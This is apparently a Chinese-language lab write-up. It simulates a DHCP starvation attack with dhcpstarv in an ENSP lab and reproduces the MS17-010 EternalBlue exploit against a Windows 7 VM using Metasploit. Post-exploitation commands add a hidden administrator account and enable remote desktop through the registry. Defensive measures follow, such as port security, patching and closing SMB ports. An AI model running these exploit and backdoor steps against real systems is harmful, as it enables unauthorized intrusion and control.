只做模拟机器使用,不使用真实机器
目录
一、 DHCP饿死和防护应对措施.................................. 1
1, 实验拓扑:...................................................... 2
2, 实验配置.......................................................... 2
2.1删改设备名字............................................ 2
2.2配置dhcp服务器...................................... 2
3,防护方案:........................................................ 4
二、MS17-010漏洞复现................................................ 6
漏洞的简介.............................................................. 6
实验环境.................................................................. 7
1,扫描主机:................................................................ 7
2, 使用msf的永恒之蓝攻击模块.............................. 8
3,先使用扫描模块3:................................................. 9
4,然后使用攻击模块.................................................... 9
5, 对靶机进行控制:................................................ 10
防范措施1:一旦中病毒首先拔掉网线..... 12
防范措施2:安装杀毒软件,立即给电脑打补丁.................................................................... 13
防范措施3:Windows用户可手动关闭端口和网络共享.................................................... 13
防范措施4:尽快将你所有重要文档资料云端备份............................................................ 13
防范措施5:小心驶得万年船..................... 14
#每日安全简讯#(20231128)
1.研究人员发现新型窃密木马Rude Stealer
http://t.cn/A6WFKy5c
2.数百所学校使用的应用程序泄露了儿童数据
http://t.cn/A6WFKy5q
3.Windows Hello 指纹技术被黑客入侵
http://t.cn/A6WFKy55
信息来源:国家计算机病毒应急处理中心
以下我将模拟如何进行DHCP饿死攻击的操作:
操作环境:ENSP,KALI操作系统 192.168.169.2/24 ,在系统下创建一张网卡和kali一个网段(kali的地址也是通过网卡自动获取所以ip不准确,要去kali里面ifconfig查看ip地址)
注意:一定要不要用自己wlan网卡。
Enter system view, return user view with Ctrl+Z. [Huawei]sy DHCPserver //更改设备名字 [DHCPserver]dhcp enable //开启DHCP功能 |
2.2配置dhcp服务器
[DHCPserver]ip pool PC //配置地址池名字 [DHCPserver-ip-pool-PC]gateway-list 192.168.169.1 //配置地址池网关 [DHCPserver-ip-pool-PC]network 192.168.169.0 mask 255.255.255.0 //配置网段 [DHCPserver-ip-pool-PC]excluded-ip-address 192.168.169.128 //配置排除地址 [DHCPserver-ip-pool-PC] dns-list 114.114.114.114 //配置DNS服务器地址 |
查看kali的ip地址:
4,安装并运行攻击模块:
语法 dhcpstarv -i 网卡名称(我这里是eth0)
第一次他会给你一个安装的提示选择y(这里如果安装不了先把kali的网卡配置成可上网的那张在切换)
运行:
5,返回ensp查看DHCP服务器:
你会发现此时你的地址池可用已经空了
先重置IP pool
reset ip pool name PC all 在用户视图下敲
查看pc端的MAC地址
进入地址池配置
static-bind ip-a ddress 192.168.169.250 mac-address 5489-9836-63F1
没有静态配置之前的:
对比分配之后的:
在kali进行攻击之后:
但此时你pc已经最开始由静态获取了,但是这种的话,比较死板,如果有很多台pc要配置很多句static
# interface GigabitEthernet0/0/1 port-security enable port-security max-mac-num 1 //最大可以学习的MAC为1 port-security protect-action shutdown //如果超过1则物理关掉这个接口 # |
在连接终端的口上配置端口安全:
效果:
2.什么是SMB协议?
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
3.SMB工作原理是什么?
(1):首先客户端发送一个SMB negport 请求数据报,,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH,结束通信。
(2):协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SessetupX请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器,然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接。
(3):当客户端和服务器完成了磋商和认证之后,它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称,之后会发送一个TconX应答数据报以表示此次连接是否接收或拒绝。
(4):连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过close SMB关闭文件。
复现环境
攻击端Kali (192.168.108.128),靶机win7(192.168.108.212)
实验条件:采用nat模式,不能使用桥接网卡!Win7的防火墙是关闭的!
复现过程:
1,扫描主机
Namp 192.168.108.0/24 //进入kali,使用嗅探工具nmap探测本网段存活的主机数。
找到靶机的ip地址,并且查看它的445端口是不是开放的,而永恒之蓝使用的就是445端口的smb服务,操作系统溢出漏洞。
搜索ms17-010漏洞的工具:search ms17-010
auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块,
exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块
一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。
结果显示0,1,4是exploit漏洞利用模块 2,3Auxiliary是辅助模块
3,先使用扫描模块
use auxiliary/scanner/smb/smb_ms17_010
使用show options 可以查看改模块可配置的内容
设置目标ip地址:
set rhosts 192.168.108.212
然后执行run
出现 Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit)
则说明该系统存在ms17-010系统漏洞,并且这是一个windows7x64的系统
4,然后使用攻击模块
use exploit/windows/smb/ms17_010_eternalblue
设置攻击目标ip地址:192.168.108.212
可以使用show options查看设置选项
设置攻击目标ip:
set rhosts 192.168.108.212
执行run或者expolit
看到已经拿到了靶机的shell
新创建一个用户:net user lwh 123456 /add
查看用户信息:net user
看到添加成功了
将用户lwh添加到管理员组:net localgroup administrators lwh /add
效果:
开启远程桌面功能:
这里首先查看3389端口状态:netstat -ano
默认他可能没有开
输入下面命令开启3389端口:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
效果:
3389端口开启。
远程桌面连接靶机:
另开一个命令行:
执行:rdesktop 192.168.102.212:3389
效果输入账户密码登录成功:
┌──(root㉿kali)-[/home/kali]
└─# rdesktop 192.168.108.212:3389
以上这个简单实验只是告诉大家这个漏洞很危险,真正的攻击能做的事情远不止这些。
首先黑客是通过网络来对你实施攻击,所以只要断网就能物理进行一个隔离。
网络安全专家郑文彬向重案组37号解释,此方案确实可行。因为非专业人士,个人无法判断电脑是否开放445等端口,可先拔开网线,阻碍病毒入侵,然后安装补丁,再将文件进行备份后,最后重新联网。但最关键是尽快将电脑系统升级或使用光盘安装补丁,修复系统漏洞。
在Windows电脑上安装运行杀毒软件扫描,同时启用Windows Update。针对“永恒之蓝”勒索病毒,微软发布了专门的修复补丁 “MS17-010”, 用以修复被 “ Eternal Blue” 攻击的系统漏洞,用户可以自行下载对应的操作系统版本的补丁进行安装,记得把补丁下载回本地,重要资料所在电脑采用断网打补丁形式。
默认状态下,Windows 的 135、139、445 端口处于开放状态,135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码,使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输。 WannaCry 正是通过这些端口来进行大规模传播的,因此用户也可以选择手动来关闭以上端口以及关闭网络共享。方法如下:
1.关闭135端口
2.关闭 135、137、138 端口
在网络邻居上点右键选“属性”,在新建好的连接上点“本地连接”,选“属性”再选择“网络”选项卡,去掉“Microsoft 网络的文件和打印机共享”和 “Microsoft 网络客户端”的复选框。这样就关闭了共享端 135 和 137 还有 138端口
3.关闭 139 端口
139 端口是 NetBIOS Session 端口,用来文件和打印共享。关闭 139 的方法是在“网络和共享中心”中“本地连接”中选取“Internet协议 (TCP/IP)”属性,进入“高级”TCP/IP 设置,“WINS” 选项卡设置里面有一项“禁用 TCP/IP的 NETBIOS ”,打勾就可关闭 139 端口。
4.关闭 445 端口
开始→运行输入 “regedit”打开注册表编辑器,确定后定位到 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters,新建名为“SMBDeviceEnabled”的DWORD值,并将其设置为 0,则可关闭 445 端口。
养成定期的文档备份习惯是非常重要的事情。在你的电脑未感染前,请将电脑中的所有重要文档进行云端备份。重要Word、PDF等小文件但需要高频使用的,比如你的论文、科研报告、研究资料、工作资料等,可通过WPS或者百度云盘进行云端备份,方便你随时在PC端或移动端查看和编辑。
1.加强自身防护
首先及时更新操作系统漏洞补丁、程序软件、杀毒软件病毒库。启用并打开“Windows防火墙”,进入“高级设置”,在入站规则里禁用“文件和打印机共享”相关规则。
2.对于不明邮件和下载的文件先杀毒扫描后使用。